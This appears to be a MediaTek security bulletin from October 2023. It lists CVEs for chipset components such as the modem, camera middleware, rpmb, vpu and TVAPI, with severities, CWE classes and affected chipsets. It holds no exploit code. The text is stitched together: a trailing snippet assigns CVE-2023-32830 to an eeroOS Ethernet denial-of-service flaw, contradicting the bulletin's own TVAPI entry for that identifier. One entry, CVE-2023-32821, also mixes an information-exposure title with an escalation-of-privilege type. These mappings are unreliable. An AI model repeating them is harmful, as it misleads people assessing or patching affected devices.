CVE-2023-32821, CVE-2023-32822, CVE-2023-32823, CVE-2023-32824, CVE-2023-32826, CVE-2023-32827, CVE-2023-32828, CVE-2023-32829, CVE-2023-32830

****Details****

CVE

**CVE-2023-20819**

Title

Out-of-bounds write in CDMA PPP protocol

Severity

High

Vulnerability Type

EoP

CWE

CWE-787 Out-of-bounds Write

Description

In CDMA PPP protocol, there is a possible out of bounds write due to a missing bounds check. This could lead to remote escalation of privilege with no additional execution privilege needed. User interaction is not needed for exploitation.

Affected Chipsets

MT2731, MT6570, MT6580, MT6595, MT6732, MT6735, MT6737, MT6737M, MT6738, MT6739, MT6750, MT6750S, MT6752, MT6753, MT6755, MT6757, MT6758, MT6761, MT6762, MT6762D, MT6762M, MT6763, MT6765, MT6765T, MT6767, MT6768, MT6769, MT6769T, MT6769Z, MT6771, MT6775, MT6779, MT6781, MT6783, MT6785, MT6785T, MT6789, MT6795, MT6797, MT6799, MT6813, MT6815, MT6833, MT6835, MT6853, MT6855, MT6873, MT6875, MT6875T, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6891, MT6893, MT6895, MT6895T, MT6896, MT6897, MT6983, MT6985, MT6989, MT8666, MT8666A, MT8667, MT8673, MT8675, MT8765, MT8766, MT8766Z, MT8768, MT8768A, MT8768B, MT8768T, MT8768Z, MT8781, MT8786, MT8788, MT8788T, MT8788X, MT8788Z, MT8791, MT8791T, MT8797, MT8798

Affected Software Versions

Modem LR11, LR12A, LR13, NR15, NR16, NR17

CVE

**CVE-2023-32819**

Title

Exposure of sensitive information to an unauthorized actor in display

Severity

High

Vulnerability Type

ID

CWE

CWE-200 Exposure of Sensitive Information to an Unauthorized Actor

Description

In display, there is a possible information disclosure due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6765, MT6768, MT6833, MT6879, MT6883, MT6885, MT6889, MT6893, MT6983, MT6985, MT8188, MT8195, MT8797, MT8798

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-32820**

Title

Denial of service in wlan firmware

Severity

High

Vulnerability Type

DoS

CWE

CWE-400 Denial of Service

Description

In wlan firmware, there is a possible firmware assertion due to improper input handling. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT5221, MT6781, MT6833, MT6853, MT6853T, MT6855, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6886, MT6889, MT6891, MT6893, MT6895, MT6983, MT6985, MT7663, MT7668, MT7902, MT7921, MT8168, MT8365, MT8518S, MT8532, MT8666, MT8673, MT8675, MT8695, MT8766, MT8768, MT8781, MT8786, MT8789, MT8791, MT8797, MT8798

Affected Software Versions

Android 11.0, 12.0, 13.0 / Linux 4.19 / Yocto 3.1, 3.3 / IOT-v23.0

CVE

**CVE-2023-32821**

Title

Exposure of sensitive information to an unauthorized actor in video

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-200 Exposure of Sensitive Information to an Unauthorized Actor

Description

In video, there is a possible out of bounds write due to a permissions bypass. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6761, MT6763, MT6765, MT6768, MT6771, MT6779, MT6785, MT6853, MT6873, MT6885

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-32822**

Title

Improper input validation in ftm

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In ftm, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT2713, MT6739, MT6761, MT6762, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6833, MT6835, MT6855, MT6877, MT6879, MT6883, MT6885, MT6886, MT6889, MT6891, MT6893, MT6895, MT6985, MT8167, MT8167S, MT8168, MT8175, MT8188, MT8195, MT8321, MT8362A, MT8365, MT8385, MT8390, MT8765, MT8766, MT8768, MT8781, MT8786, MT8788, MT8789, MT8791, MT8797, MT8798

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-32823**

Title

Integer overflow or wraparound in rpmb

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-190 Integer Overflow or Wraparound

Description

In rpmb , there is a possible memory corruption due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6739, MT6761, MT6762, MT6765, MT6768, MT6769, MT6779, MT6781, MT6785, MT6789, MT6833, MT6853, MT6853T, MT6855, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6889, MT6891, MT6893, MT6895, MT6983, MT6985, MT8666, MT8765, MT8788

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-32824**

Title

Double free in rpmb

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-415 Double Free

Description

In rpmb , there is a possible double free due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6739, MT6761, MT6762, MT6765, MT6768, MT6769, MT6779, MT6781, MT6785, MT6789, MT6833, MT6853, MT6853T, MT6855, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6889, MT6891, MT6893, MT6895, MT6983, MT6985, MT8666, MT8765, MT8788

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-32826**

Title

Out-of-bounds write in camera middleware

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-787 Out-of-bounds Write

Description

In camera middleware, there is a possible out of bounds write due to a missing input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6879, MT6886, MT6895, MT6983, MT6985, MT6989, MT8167, MT8167S, MT8168, MT8173, MT8175, MT8185, MT8188, MT8195, MT8321, MT8362A, MT8365, MT8385, MT8390, MT8395, MT8666, MT8673, MT8675, MT8765, MT8766, MT8768, MT8781, MT8786, MT8788, MT8789, MT8791, MT8791T, MT8797, MT8798

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-32827**

Title

Out-of-bounds write in camera middleware

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-787 Out-of-bounds Write

Description

In camera middleware, there is a possible out of bounds write due to a missing input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6879, MT6886, MT6895, MT6983, MT6985, MT6989, MT8167, MT8167S, MT8168, MT8173, MT8175, MT8185, MT8188, MT8195, MT8321, MT8362A, MT8365, MT8385, MT8390, MT8395, MT8666, MT8673, MT8675, MT8765, MT8766, MT8768, MT8781, MT8786, MT8788, MT8789, MT8791, MT8791T, MT8797, MT8798

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-32828**

Title

Integer overflow or wraparound in vpu

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-190 Integer Overflow or Wraparound

Description

In vpu, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6771, MT6779, MT6785, MT6853, MT6853T, MT6873, MT6877, MT6885, MT6891, MT6893, MT8183, MT8188, MT8195, MT8390, MT8395

Affected Software Versions

Android 12.0 / IOT-v23.0

CVE

**CVE-2023-32829**

Title

Out-of-bounds write in apusys

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-787 Out-of-bounds Write

Description

In apusys, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6879, MT6886, MT6891, MT6895, MT6896, MT6983, MT6985, MT8137, MT8139, MT8188, MT8195, MT8195Z, MT8390, MT8395

Affected Software Versions

Android 12.0, 13.0 / Yocto 3.1, 3.3, 4.0 / IOT-v23.0

CVE

**CVE-2023-32830**

Title

Out-of-bounds write in TVAPI

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-787 Out-of-bounds Write

Description

In TVAPI, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT5527, MT5583, MT5598, MT5599, MT5670, MT5680, MT5691, MT5695, MT5806, MT5813, MT5815, MT5816, MT5833, MT5835, MT5895, MT9010, MT9011, MT9012, MT9016, MT9020, MT9021, MT9022, MT9215, MT9216, MT9221, MT9222, MT9255, MT9256, MT9266, MT9269, MT9285, MT9286, MT9600, MT9602, MT9610, MT9612, MT9613, MT9615, MT9617, MT9629, MT9630, MT9631, MT9632, MT9633, MT9636, MT9638, MT9639, MT9649, MT9650, MT9652, MT9653, MT9660, MT9666, MT9667, MT9669, MT9670, MT9671, MT9675, MT9679, MT9685, MT9686, MT9688, MT9900, MT9901, MT9931, MT9950, MT9969, MT9970, MT9980, MT9981

Affected Software Versions

Android 10.0, 11.0

****Vulnerability Type Definition****

Abbreviation

**Definition**

RCE

Remote Code Execution

EoP

Elevation of Privilege

ID

Information Disclosure

DoS

Denial of Service

N/A

Classification not available

****Versions****

**Version**

**Date**

**Description**

1.0

October 2, 2023

Bulletin published.

****Notes****

Information above is generated only at the time of creation of this Security Bulletin. The list of affected chipsets could be not complete. For any further information, device OEMs can reach your MediaTek contact person if needed.

If you want to report a security vulnerability in MediaTek chipsets or products, please go to Report Security Vulnerability page on MediaTek website.

CVE-2023-32830: October 2023

A vulnerability has been found in eeroOS up to 6.16.4-11 and classified as critical. This vulnerability affects unknown code of the component Ethernet Interface. The manipulation leads to denial of service. The attack needs to be approached within the local network. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-241024.

Tag

#dos